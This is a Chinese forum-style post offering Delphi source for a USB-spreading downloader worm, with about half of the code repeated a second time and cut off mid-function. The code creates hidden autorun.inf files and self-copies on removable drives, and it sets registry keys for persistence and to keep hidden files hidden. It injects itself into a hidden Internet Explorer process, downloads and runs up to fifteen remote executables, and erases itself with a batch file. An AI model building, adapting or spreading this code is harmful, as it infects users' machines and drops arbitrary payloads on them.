delphi 含U盘感染的downloader代码
一个含U盘感染的downloader代码。可以作为原理进行分析。(delphi)
program AutoDown;
{$R 'ICON32.RES' 'ICON32.TXT' }
{$IMAGEBASE $17140000}
uses
Windows, SysUtils, wininet, mmsystem, messages;
var
htimer: integer;
msg: tmsg;
dw: bool;
url1: pchar =
('http://www.xxx.com/xx.exe');
url2: pchar =
('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');
url3: pchar =
('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');
url4: pchar =
('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');
url5: pchar =
('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');
url6: pchar =
('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');
url7: pchar =
('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');
url8: pchar =
('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');
url9: pchar =
('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');
url10: pchar =
('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');
url11: pchar =
('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');
url12: pchar =
('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');
url13: pchar =
('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');
url14: pchar =
('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');
url15: pchar =
('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');
Downfile: function(Caller: pointer; URL: PChar; FileName: PChar; Reserved:
LongWord; StatusCB: pointer): Longint; stdcall;
hShell, hUrlmon: THandle;
ShellRun: function(hWnd: HWND; Operation, FileName, Parameters, Directory:
PChar; ShowCmd: Integer): Cardinal; stdcall;
procedure RunInject(InjType: integer); stdcall; forward;
const
ExeName = 'system.exe';
faReadOnly = $00000001;
faHidden = $00000002;
faSysFile = $00000004;
faVolumeID = $00000008;
faDirectory = $00000010;
faArchive = $00000020;
faAnyFile = $0000003F;
Lyint: array[0..9] of Char = ('0', '1', '2', '3', '4', '5', '6', '7', '8',
'9');
Lychr: array[0..25] of Char = ('a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i',
'j',
'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't',
'u', 'v', 'w', 'x', 'y', 'z');
var
i, Len, infsize: integer;
exefile, OpenPath, DriverList, TempFile: string;
NoDel: integer;
sa1, sa2, MyCursor: THandle;
type
TFileName = type string;
TSearchRec = record
Time: Integer;
Size: Integer;
Attr: Integer;
Name: TFileName;
ExcludeAttr: Integer;
FindHandle: THandle platform;
FindData: TWin32FindData platform;
end;
LongRec = packed record
case Integer of
0: (Lo, Hi: Word);
1: (Words: array[0..1] of Word);
2: (Bytes: array[0..3] of Byte);
end;
{$R *.RES}
function FileExists(const FileName: string): Boolean;
var
Handle: THandle;
FindData: TWin32FindData;
begin
Handle := FindFirstFileA(PChar(FileName), FindData);
result := Handle <> INVALID_HANDLE_VALUE;
if result then
begin
CloseHandle(Handle);
end;
end;
function FindMatchingFile(var F: TSearchRec): Integer;
var
LocalFileTime: TFileTime;
begin
with F do
begin
while FindData.dwFileAttributes and ExcludeAttr <> 0 do
if not FindNextFile(FindHandle, FindData) then
begin
Result := GetLastError;
Exit;
end;
FileTimeToLocalFileTime(FindData.ftLastWriteTime, LocalFileTime);
FileTimeToDosDateTime(LocalFileTime, LongRec(Time).Hi,
LongRec(Time).Lo);
Size := FindData.nFileSizeLow;
Attr := FindData.dwFileAttributes;
Name := FindData.cFileName;
end;
Result := 0;
end;
procedure FindClose(var F: TSearchRec);
begin
if F.FindHandle <> INVALID_HANDLE_VALUE then
begin
Windows.FindClose(F.FindHandle);
F.FindHandle := INVALID_HANDLE_VALUE;
end;
end;
function FindFirst(const Path: string; Attr: Integer;
var
F: TSearchRec): Integer;
const
faSpecial = faHidden or faSysFile or faVolumeID or faDirectory;
begin
F.ExcludeAttr := not Attr and faSpecial;
F.FindHandle := FindFirstFile(PChar(Path), F.FindData);
if F.FindHandle <> INVALID_HANDLE_VALUE then
begin
Result := FindMatchingFile(F);
if Result <> 0 then FindClose(F);
end
else
Result := GetLastError;
end;
function FileSetAttr(const FileName: string; Attr: Integer): Integer;
begin
Result := 0;
if not SetFileAttributes(PChar(FileName), Attr) then
Result := GetLastError;
end;
function deletefile(const FileName: string): Integer;
begin
Result := GetFileAttributes(PChar(FileName));
end;
function GetDirectory(dInt: integer): string;
var
s: array[0..255] of Char;
begin
case dInt of
0: GetWindowsDirectory(@s, 256); //Windows安装文件夾所存在的路径
1: GetSystemDirectory(@s, 256); //系统文件夾所存在的路径
2: GetTempPath(256, @s); //Temp文件夾所存在的路径
end;
if dInt = 2 then
result := string(s)
else
result := string(s) + '\';
end;
function ExtractFilePath(FileName: string): string;
begin
Result := '';
while ((Pos('\', FileName) <> 0) or (Pos('/', FileName) <> 0)) do
begin
Result := Result + Copy(FileName, 1, 1);
Delete(FileName, 1, 1);
end;
end;
function ExtractFileName(FileName: string): string;
begin
while Pos('\', FileName) <> 0 do
Delete(FileName, 1, Pos('\', FileName));
while Pos('/', FileName) <> 0 do
Delete(FileName, 1, Pos('/', FileName));
Result := FileName;
end;
function SetRegValue(key: Hkey; subkey, name, value: string): boolean;
var
regkey: hkey;
begin
result := false;
RegCreateKey(key, PChar(subkey), regkey);
if RegSetValueEx(regkey, Pchar(name), 0, REG_EXPAND_SZ, pchar(value),
length(value)) = 0 then
result := true;
RegCloseKey(regkey);
end;
function CompareText(const S1, S2: string): Integer; assembler;
asm
PUSH ESI
PUSH EDI
PUSH EBX
MOV ESI,EAX
MOV EDI,EDX
OR EAX,EAX
JE @@0
MOV EAX,[EAX-4]
@@0: OR EDX,EDX
JE @@1
MOV EDX,[EDX-4]
@@1: MOV ECX,EAX
CMP ECX,EDX
JBE @@2
MOV ECX,EDX
@@2: CMP ECX,ECX
@@3: REPE CMPSB
JE @@6
MOV BL,BYTE PTR [ESI-1]
CMP BL,'a'
JB @@4
CMP BL,'z'
JA @@4
SUB BL,20H
@@4: MOV BH,BYTE PTR [EDI-1]
CMP BH,'a'
JB @@5
CMP BH,'z'
JA @@5
SUB BH,20H
@@5: CMP BL,BH
JE @@3
MOVZX EAX,BL
MOVZX EDX,BH
@@6: SUB EAX,EDX
POP EBX
POP EDI
POP ESI
end;
procedure DelMe;
var
BatchFile: TextFile;
BatchFileName: string;
ProcessInfo: TProcessInformation;
StartUpInfo: TStartupInfo;
begin
BatchFileName := ExtractFilePath(GetDirectory(2)) + '~Lying.bAt';
AssignFile(BatchFile, BatchFileName);
Rewrite(BatchFile);
Writeln(BatchFile, ':tRy');
Writeln(BatchFile, 'DeL "' + ParamStr(0) + '" /a');
Writeln(BatchFile, 'iF eXiSt "' + ParamStr(0) + '"' + ' gOtO tRy');
Writeln(BatchFile, 'dEl %0 /A');
CloseFile(BatchFile);
SetFileAttributes(pchar(BatchFileName), FILE_ATTRIBUTE_HIDDEN +
FILE_ATTRIBUTE_SYSTEM);
FillChar(StartUpInfo, SizeOf(StartUpInfo), $00);
StartUpInfo.dwFlags := STARTF_USESHOWWINDOW;
StartUpInfo.wShowWindow := SW_HIDE;
if CreateProcess(nil, PChar(BatchFileName), nil, nil,
False, IDLE_PRIORITY_CLASS, nil, nil, StartUpInfo,
ProcessInfo) then
begin
CloseHandle(ProcessInfo.hThread);
CloseHandle(ProcessInfo.hProcess);
end;
end;
function GetDrives: string;
var
DiskType: Word;
D: Char;
Str: string;
i: Integer;
begin
for i := 1 to 25 do //遍历26个字母
begin
D := Chr(i + 65);
Str := D + ':\';
DiskType := GetDriveType(PChar(Str)); //得到本地磁盘,网络磁盘和移动磁盘...
if {(DiskType = DRIVE_FIXED) or (DiskType = DRIVE_REMOTE) or} (DiskType =
DRIVE_REMOVABLE) then
Result := Result + D;
end;
end;
function SendMetoDriver(const DriveName: string): Boolean;
var
InfFile, Mmfile: string;
InfText: TextFile;
begin
InfFile := DriveName + 'Autorun.inf';
MmFile := DriveName + ExeName;
if (not FileExists(InfFile)) then
begin
AssignFile(InfText, InfFile);
try
ReWrite(InfText);
WriteLn(InfText, '[AutoRun]');
WriteLn(InfText, 'open=' + ExeName);
WriteLn(InfText, 'shellexecute=' + ExeName);
WriteLn(InfText, 'shell\Auto\command=' + ExeName);
finally
CloseFile(InfText);
end;
SetFileAttributes(pchar(inffile), FILE_ATTRIBUTE_HIDDEN +
FILE_ATTRIBUTE_SYSTEM);
end;
if (not FileExists(MmFile)) then
begin
CopyFile(pchar(ParamStr(0)), pchar(MmFile), false);
SetFileAttributes(pchar(MmFile), FILE_ATTRIBUTE_HIDDEN +
FILE_ATTRIBUTE_SYSTEM);
end;
end;
function IsFileInUse(fName: string): boolean;
var
HFileRes: HFILE;
begin
Result := false;
if not FileExists(fName) then
exit;
HFileRes := CreateFile(pchar(fName), GENERIC_READ or GENERIC_WRITE,
0 {this is the trick!}, nil, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0);
Result := (HFileRes = INVALID_HANDLE_VALUE);
if not Result then
CloseHandle(HFileRes);
end;
procedure dir;
begin
if not directoryexists(pchar('C:\Program Files\WindowsUpdate\')) then
try
createdir(pchar('C:\Program Files\WindowsUpdate\'));
except
end;
end;
procedure regme;
begin
SetRegValue(HKEY_LOCAL_MACHINE,
'SoftWare\Microsoft\Windows\CurrentVersion\policies\Explorer\Run', 'Lying', exefile); //自启动
SetRegValue(HKEY_LOCAL_MACHINE,
'SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL',
'CheckedValue', '2'); //强制隐藏系统文件
end;
procedure infect();
var
i, len: integer;
driverlist: string;
begin
DriverList := GetDrives;
Len := Length(DriverList);
for i := Len downto 1 do
SendMetoDriver(DriverList[i] + ':\');
end;
function GetOnlineStatus: Boolean;
var
ConTypes: Integer;
begin
ConTypes := INTERNET_CONNECTION_MODEM + INTERNET_CONNECTION_LAN +
INTERNET_CONNECTION_PROXY;
if (InternetGetConnectedState(@ConTypes, 0) = False) then
Result := False
else
Result := True;
end;
procedure GetDebugPrivs; //提升进程权限
var
hToken: THandle;
tkp: TTokenPrivileges;
retval: dword;
begin
if (OpenProcessToken(GetCurrentProcess, TOKEN_ADJUST_PRIVILEGES or
TOKEN_QUERY, hToken)) then
begin
LookupPrivilegeValue(nil, 'SeDebugPrivilege', tkp.Privileges[0].Luid);
tkp.PrivilegeCount := 1;
tkp.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges(hToken, False, tkp, 0, nil, retval);
end;
end;
procedure TimerProc(uID, uMsg, dwUser, dw1, dw2: DWORD); stdcall;
//网络连接时启动各种功能和下载
begin
try
infect;
except
end;
if GetOnlineStatus and not dw then
begin
try
GetDebugPrivs;
RunInject(1); //1 注入iexplore.exe
except
end;
dw := true;
end;
//timeKillEvent(hTimer3);
end;
procedure infecttimer; stdcall;
begin
//Messagebox(0,pchar(time1+' '+hostbc+' '+urlbc),'数据', MB_OK);
hTimer := TimeSetEvent(6000, 0, TimerProc, 0, TIME_PERIODIC);
while (GetMessage(Msg, 0, 0, 0)) do
;
end;
procedure AutoAndw0rM;
var
tid: dword;
begin
dw := false;
if pos('pagefile.pif', pchar(paramstr(0))) > 0 then exitprocess(0);
CreateMutex(nil, TRUE, 'dx'); //TRUE 标明该进程拥有此 Mutex 对象
if (GetLastError = ERROR_ALREADY_EXISTS) then exit; //Mutex 对象是否存在
dir;
regme; //加载注册表
CreateThread(nil, 0, @infecttimer, nil, 0, TID);
while (GetMessage(Msg, 0, 0, 0)) do
;
end;
procedure Download; //下载过程
begin
// dw := true; //下载了一次
LoadLibrary('kernel32.dll');
LoadLibrary('user32.dll');
hShell := LoadLibrary('Shell32.dll');
hUrlmon := LoadLibrary('urlmon.dll');
@ShellRun := GetProcAddress(hShell, 'ShellExecuteA');
@Downfile := GetProcAddress(hUrlmon, 'URLDownloadToFileA');
{if not directoryexists(pchar('C:\Program Files\WindowsUpdate\')) then
try
createdir(pchar('C:\Program Files\WindowsUpdate\'));
except
end; }
try
Downfile(nil,pchar(url1),'C:\Program Files\WindowsUpdate\1.exe', 0, nil);
ShellRun(0,'open','C:\Program Files\WindowsUpdate\1.exe',nil,nil,5);
except
end;
{Downfile(nil, pchar('http://www.mybr.org/test/a.exe'),
'C:\Program Files\WindowsUpdate\1.exe', 0, nil);
ShellRun(0, 'open', 'C:\Program Files\WindowsUpdate\1.exe', nil, nil, 5);
}
try
Downfile(nil, pchar(url2), 'C:\Program Files\WindowsUpdate\2.exe', 0, nil);
ShellRun(0, 'open', 'C:\Program Files\WindowsUpdate\2.exe', nil, nil, 5);
except
end;
try
Downfile(nil, pchar(url3), 'C:\Program Files\WindowsUpdate\3.exe', 0, nil);
ShellRun(0, 'open', 'C:\Program Files\WindowsUpdate\3.exe', nil, nil, 5);
except
end;
try
Downfile(nil, pchar(url4), 'C:\Program Files\WindowsUpdate\4.exe', 0, nil);
ShellRun(0, 'open', 'C:\Program Files\WindowsUpdate\4.exe', nil, nil, 5);
except
end;
try
Downfile(nil, pchar(url5), 'C:\Program Files\WindowsUpdate\5.exe', 0, nil);
ShellRun(0, 'open', 'C:\Program Files\WindowsUpdate\5.exe', nil, nil, 5);
except
end;
try
Downfile(nil, pchar(url6), 'C:\Program Files\WindowsUpdate\6.exe', 0, nil);
ShellRun(0, 'open', 'C:\Program Files\WindowsUpdate\6.exe', nil, nil, 5);
except
end;
try
Downfile(nil, pchar(url7), 'C:\Program Files\WindowsUpdate\7.exe', 0, nil);
ShellRun(0, 'open', 'C:\Program Files\WindowsUpdate\7.exe', nil, nil, 5);
except
end;
try
Downfile(nil, pchar(url8), 'C:\Program Files\WindowsUpdate\8.exe', 0, nil);
ShellRun(0, 'open', 'C:\Program Files\WindowsUpdate\8.exe', nil, nil, 5);
except
end;
try
Downfile(nil, pchar(url9), 'C:\Program Files\WindowsUpdate\9.exe', 0, nil);
ShellRun(0, 'open', 'C:\Program Files\WindowsUpdate\9.exe', nil, nil, 5);
except
end;
try
Downfile(nil, pchar(url10), 'C:\Program Files\WindowsUpdate\10.exe', 0,
nil);
ShellRun(0, 'open', 'C:\Program Files\WindowsUpdate\10.exe', nil, nil, 5);
except
end;
try
Downfile(nil, pchar(url11), 'C:\Program Files\WindowsUpdate\11.exe', 0,
nil);
ShellRun(0, 'open', 'C:\Program Files\WindowsUpdate\11.exe', nil, nil, 5);
except
end;
try
Downfile(nil, pchar(url12), 'C:\Program Files\WindowsUpdate\12.exe', 0,
nil);
ShellRun(0, 'open', 'C:\Program Files\WindowsUpdate\12.exe', nil, nil, 5);
except
end;
try
Downfile(nil, pchar(url13), 'C:\Program Files\WindowsUpdate\13.exe', 0,
nil);
ShellRun(0, 'open', 'C:\Program Files\WindowsUpdate\13.exe', nil, nil, 5);
except
end;
try
Downfile(nil, pchar(url14), 'C:\Program Files\WindowsUpdate\14.exe', 0,
nil);
ShellRun(0, 'open', 'C:\Program Files\WindowsUpdate\14.exe', nil, nil, 5);
except
end;
try
Downfile(nil, pchar(url15), 'C:\Program Files\WindowsUpdate\15.exe', 0,
nil);
ShellRun(0, 'open', 'C:\Program Files\WindowsUpdate\15.exe', nil, nil, 5);
except
end;
//ExitProcess(0);
end;
procedure Inject(ProcessHandle: longword; EntryPoint: pointer); //注入
var
Module, NewModule: Pointer;
Size, BytesWritten, TID: longword;
begin
//这里得到的值为一个返回指针型变量,指向内容包括进程映像的基址
Module := Pointer(GetModuleHandle(nil));
//得到内存映像的长度
Size := PImageOptionalHeader(Pointer(integer(Module) +
PImageDosHeader(Module)._lfanew +
SizeOf(dword) + SizeOf(TImageFileHeader))).SizeOfImage;
//在Exp进程的内存范围内分配一个足够长度的内存
VirtualFreeEx(ProcessHandle, Module, 0, MEM_RELEASE);
//确定起始基址和内存映像基址的位置
NewModule := VirtualAllocEx(ProcessHandle, Module, Size, MEM_COMMIT or
MEM_RESERVE, PAGE_EXECUTE_READWRITE);
//确定上面各项数据后,这里开始进行操作
WriteProcessMemory(ProcessHandle, NewModule, Module, Size, BytesWritten);
//建立远程线程,至此注入过程完成
createRemoteThread(ProcessHandle, nil, 0, EntryPoint, Module, 0, TID);
end;
procedure setme;
begin
if (CompareText(ParamStr(0), Copy(ParamStr(0), 1, 3) + ExeName) = 0) and
(CompareText(ExtractFileName(ParamStr(0)), exename) = 0) then
begin
sa1 := Findwindow('CabinetWClass', nil); //我的电脑
if GetForegroundwindow <> sa1 then exit;
sa1 := findwindowex(sa1, 0, 'WorkerW', nil);
sa1 := findwindowex(sa1, 0, 'ReBarWindow32', nil);
sa1 := findwindowex(sa1, 0, 'ComboBoxEx32', nil);
sa2 := findwindowex(sa1, 0, 'ToolbarWindow32', nil);
sa1 := findwindowex(sa1, 0, 'ComboBox', nil);
sa1 := findwindowex(sa1, 0, 'Edit', nil);
OpenPath := Copy(ParamStr(0), 1, 3);
SendMessage(sa1, WM_SETTEXT, length(OpenPath), longint(pchar(OpenPath)));
SendMessage(sa2, WM_LBUTTONDOWN, 0, 0);
SendMessage(sa2, WM_LBUTTONUP, 0, 0);
SendMessage(sa1, WM_KILLFOCUS, 0, 0); //去掉焦点,避免怀疑...
NoDel := 1;
end;
if IsFileInUse(exefile) = false then
begin
SetFileAttributes(pchar(exefile), 0);
DeleteFile(pchar(exefile));
Copyfile(pchar(ParamStr(0)), pchar(exefile), false);
SetFileAttributes(pchar(exefile), FILE_ATTRIBUTE_HIDDEN +
FILE_ATTRIBUTE_SYSTEM);
winexec(pchar(exefile), sw_hide);
end;
//AutoAndw0rM;
if (NoDel <> 1) then DelMe; //如果nodel这个变量<>1,就自删除
ExitProcess(0);
end;
procedure RunInject(InjType: integer);
var
ProcessHandle, PID: longword;
begin
if InjType = 0 then //注入explorer.exe
begin
//获取Exp进程的PID码,Shell_TrayWnd为类名,相关的需用SPY++来查看
GetWindowThreadProcessId(FindWindow('Shell_TrayWnd', nil), @Pid);
end
else //注入iexplore.exe
begin
//createProcess(nil,PChar(GetIEAppPath), nil, nil, False, 0, nil, nil, StartupInfo, ProcessInfo);
winexec(PChar('C:\Program Files\Internet Explorer\IEXPLORE.EXE'), sw_hide);
sleep(500);
GetWindowThreadProcessId(FindWindow('IEFrame', nil), @Pid);
//打开进程
ProcessHandle := OpenProcess(PROCESS_ALL_ACCESS, False, PID);
Inject(ProcessHandle, @Download);
//关闭对像
CloseHandle(ProcessHandle);
//sleep(500);
//ExtDelMe;
end;
end;
begin
exefile := Pchar(GetDirectory(2) + ExeName);
if CompareText(ParamStr(0), exefile) <> 0 then
setme
else
begin
AutoAndw0rM;
// ExitProcess(0);
end;
end.
program AutoDown;
{$R 'ICON32.RES' 'ICON32.TXT' }
{$IMAGEBASE $17140000}
uses
Windows, SysUtils, wininet, mmsystem, messages;
var
htimer: integer;
msg: tmsg;
dw: bool;
url1: pchar =
('http://www.xxx.com/xx.exe');
url2: pchar =
('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');
url3: pchar =
('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');
url4: pchar =
('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');
url5: pchar =
('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');
url6: pchar =
('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');
url7: pchar =
('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');
url8: pchar =
('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');
url9: pchar =
('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');
url10: pchar =
('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');
url11: pchar =
('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');
url12: pchar =
('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');
url13: pchar =
('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');
url14: pchar =
('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');
url15: pchar =
('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');
Downfile: function(Caller: pointer; URL: PChar; FileName: PChar; Reserved:
LongWord; StatusCB: pointer): Longint; stdcall;
hShell, hUrlmon: THandle;
ShellRun: function(hWnd: HWND; Operation, FileName, Parameters, Directory:
PChar; ShowCmd: Integer): Cardinal; stdcall;
procedure RunInject(InjType: integer); stdcall; forward;
const
ExeName = 'system.exe';
faReadOnly = $00000001;
faHidden = $00000002;
faSysFile = $00000004;
faVolumeID = $00000008;
faDirectory = $00000010;
faArchive = $00000020;
faAnyFile = $0000003F;
Lyint: array[0..9] of Char = ('0', '1', '2', '3', '4', '5', '6', '7', '8',
'9');
Lychr: array[0..25] of Char = ('a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i',
'j',
'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't',
'u', 'v', 'w', 'x', 'y', 'z');
var
i, Len, infsize: integer;
exefile, OpenPath, DriverList, TempFile: string;
NoDel: integer;
sa1, sa2, MyCursor: THandle;
type
TFileName = type string;
TSearchRec = record
Time: Integer;
Size: Integer;
Attr: Integer;
Name: TFileName;
ExcludeAttr: Integer;
FindHandle: THandle platform;
FindData: TWin32FindData platform;
end;
LongRec = packed record
case Integer of
0: (Lo, Hi: Word);
1: (Words: array[0..1] of Word);
2: (Bytes: array[0..3] of Byte);
end;
{$R *.RES}
function FileExists(const FileName: string): Boolean;
var
Handle: THandle;
FindData: TWin32FindData;
begin
Handle := FindFirstFileA(PChar(FileName), FindData);
result := Handle <> INVALID_HANDLE_VALUE;
if result then
begin
CloseHandle(Handle);
end;
end;
function FindMatchingFile(var F: TSearchRec): Integer;
var
LocalFileTime: TFileTime;
begin
with F do
begin
while FindData.dwFileAttributes and ExcludeAttr <> 0 do
if not FindNextFile(FindHandle, FindData) then
begin
Result := GetLastError;
Exit;
end;
FileTimeToLocalFileTime(FindData.ftLastWriteTime, LocalFileTime);
FileTimeToDosDateTime(LocalFileTime, LongRec(Time).Hi,
LongRec(Time).Lo);
Size := FindData.nFileSizeLow;
Attr := FindData.dwFileAttributes;
Name := FindData.cFileName;
end;
Result := 0;
end;
procedure FindClose(var F: TSearchRec);
begin
if F.FindHandle <> INVALID_HANDLE_VALUE then
begin
Windows.FindClose(F.FindHandle);
F.FindHandle := INVALID_HANDLE_VALUE;
end;
end;
function FindFirst(const Path: string; Attr: Integer;
var
F: TSearchRec): Integer;
const
faSpecial = faHidden or faSysFile or faVolumeID or faDirectory;
begin
F.ExcludeAttr := not Attr and faSpecial;
F.FindHandle := FindFirstFile(PChar(Path), F.FindData);
if F.FindHandle <> INVALID_HANDLE_VALUE then
begin
Result := FindMatchingFile(F);
if Result <> 0 then FindClose(F);
end
else
Result := GetLastError;
end;
function FileSetAttr(const FileName: string; Attr: Integer): Integer;
begin
Result := 0;
if not SetFileAttributes(PChar(FileName), Attr) then
Result := GetLastError;
end;
function deletefile(const FileName: string): Integer;
begin
Result := GetFileAttributes(PChar(FileName));
end;
function GetDirectory(dInt: integer): string;
var
s: array[0..255] of Char;
begin
case dInt of
0: GetWindowsDirectory(@s, 256); //Windows安装文件夾所存在的路径
1: GetSystemDirectory(@s, 256); //系统文件夾所存在的路径
2: GetTempPath(256, @s); //Temp文件夾所存在的路径
end;
if dInt = 2 then
result := string(s)
else
result := string(s) + '\';
end;
function ExtractFilePath(FileName: string): string;
begin
Result := '';
while ((Pos('\', FileName) <> 0) or (Pos('/', FileName) <> 0)) do
begin
Result := Result + Copy(FileName, 1, 1);
Delete(FileName, 1, 1);
end;
end;
function ExtractFileName(FileName: string): string;
begin
while Pos('\', FileName) <> 0 do
Delete(FileName, 1, Pos('\', FileName));
while Pos('/', FileName) <> 0 do
Delete(FileName, 1, Pos('/', FileName));
Result := FileName;
end;
function SetRegValue(key: Hkey; subkey, name, value: string): boolean;
var
regkey: hkey;
begin
result := false;
RegCreateKey(key, PChar(subkey), regkey);
if RegSetValueEx(regkey, Pchar(name), 0, REG_EXPAND_SZ, pchar(value),
length(value)) = 0 then
result := true;
RegCloseKey(regkey);
end;
function CompareText(const S1, S2: string): Integer; assembler;
asm
PUSH ESI
PUSH EDI
PUSH EBX
MOV ESI,EAX
MOV EDI,EDX
OR EAX,EAX
JE @@0
MOV EAX,[EAX-4]
@@0: OR EDX,EDX
JE @@1
MOV EDX,[EDX-4]
@@1: MOV ECX,EAX
CMP ECX,EDX
JBE @@2
MOV ECX,EDX
@@2: CMP ECX,ECX
@@3: REPE CMPSB
JE @@6
MOV BL,BYTE PTR [ESI-1]
CMP BL,'a'
JB @@4
CMP BL,'z'
JA @@4
SUB BL,20H
@@4: MOV BH,BYTE PTR [EDI-1]
CMP BH,'a'
JB @@5
CMP BH,'z'
JA @@5
SUB BH,20H
@@5: CMP BL,BH
JE @@3
MOVZX EAX,BL
MOVZX EDX,BH
@@6: SUB EAX,EDX
POP EBX
POP EDI
POP ESI
end;
procedure DelMe;
var
BatchFile: TextFile;
BatchFileName: string;
ProcessInfo: TProcessInformation;
StartUpInfo: TStartupInfo;
begin
BatchFileName := ExtractFilePath(GetDirectory(2)) + '~Lying.bAt';
AssignFile(BatchFile, BatchFileName);
Rewrite(BatchFile);
Writeln(BatchFile, ':tRy');
Writeln(BatchFile, 'DeL "' + ParamStr(0) + '" /a');
Writeln(BatchFile, 'iF eXiSt "' + ParamStr(0) + '"' + ' gOtO tRy');
Writeln(BatchFile, 'dEl %0 /A');
CloseFile(BatchFile);
SetFileAttributes(pchar(BatchFileName), FILE_ATTRIBUTE_HIDDEN +
FILE_ATTRIBUTE_SYSTEM);
FillChar(StartUpInfo, SizeOf(StartUpInfo), $00);
StartUpInfo.dwFlags := STARTF_USESHOWWINDOW;
StartUpInfo.wShowWindow := SW_HIDE;
if CreateProcess(nil, PChar(BatchFileName), nil, nil,
False, IDLE_PRIORITY_CLASS, nil, nil, StartUpInfo,
ProcessInfo) then
begin
CloseHandle(ProcessInfo.hThread);
CloseHandle(ProcessInfo.hProcess);
end;
end;
function GetDrives: string;
var
DiskType: Word;
D: Char;
Str: string;
i: Integer;
begin
for i := 1 to 25 do //遍历26个字母
begin
D := Chr(i + 65);
Str := D + ':\';
DiskType := GetDriveType(PChar(Str)); //得到本地磁盘,网络磁盘和移动磁盘...
if {(DiskType = DRIVE_FIXED) or (DiskType = DRIVE_REMOTE) or} (DiskType =
DRIVE_REMOVABLE) then
Result := Result + D;
end;
end;
function SendMetoDriver(const DriveName: string): Boolean;
var
InfFile, Mmfile: string;
InfText: TextFile;
begin
